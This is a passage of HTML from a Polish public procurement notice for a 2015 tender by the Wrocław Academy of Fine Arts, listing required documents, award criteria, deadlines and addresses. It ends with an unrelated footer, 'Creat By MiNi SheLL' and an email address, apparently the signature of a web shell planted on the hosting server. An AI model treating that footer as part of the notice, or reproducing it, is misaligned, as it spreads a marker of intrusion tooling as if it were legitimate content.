<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty (załącznik nr 1 do SIWZ).
2)	Formularz asortymentowo-cenowy szczegółowy opis przedmiotu zamówienia (załącznik nr 2 do SIWZ).
3)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków (ile dotyczny).
4)	Dokument, z którego wynika upoważnienie Wykonawcy do podpisywania oferty lub pełnomocnictwo do reprezentowania Wykonawcy jeżeli ofertę składa pełnomocnik, a prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych.
5)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość - 40</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław
pok. 217, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2015 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław, 
sekretariat Kanclerza (pok. 107, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com